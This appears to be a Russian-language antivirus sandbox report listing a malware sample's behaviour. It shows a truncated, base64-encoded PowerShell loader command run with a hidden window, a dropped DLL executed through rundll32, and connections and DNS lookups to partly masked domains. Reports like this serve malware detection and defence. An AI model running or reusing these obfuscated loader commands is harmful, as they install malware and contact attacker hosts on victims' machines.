Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABCAGoANQBpAGgAMwBoAD0AKAAnAFgAJwArACgAJwBxACcAKwAnAHIAcQAnACkAKwAoACcAMwAnACsAJwBsADMAJwApACkAOwAuACgAJwBuAGUAdwAnACsAJwAtAGkAJwArACcAdABlAG0AJwApACAAJABFAE4AVgA6AHUAUwBlAHIAUAByAE8AZgBJAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1488
- %TEMP%\1218102.cvr
- %HOMEPATH%\i0be2ui\sllt200\nv03qqk.dll
- 'ad####ngoutloud.com':443
- 'ce####insurance.com':443
- 'ad####ngoutloud.com':443
- 'ce####insurance.com':443
- DNS ASK ch######sinessnetwork.org
- DNS ASK mo###oon.com
- DNS ASK ad####ngoutloud.com
- DNS ASK ap##.###saquihost.com.br
- DNS ASK ce####insurance.com
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\I0be2ui\Sllt200\Nv03qqk.dll 0
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABCAGoANQBpAGgAMwBoAD0AKAAnAFgAJwArACgAJwBxACcAKwAnAHIAcQAnACkAKwAoACcAMwAnACsAJwBsADMAJwApACkAOwAuACgAJwBuAGUAdwAnACsAJwAtAGkAJwArACcAdABlAG0AJwApACAAJABFAE4AVgA6AHUAUwBlAHIAUAByAE8AZgBJAG... (со скрытым окном)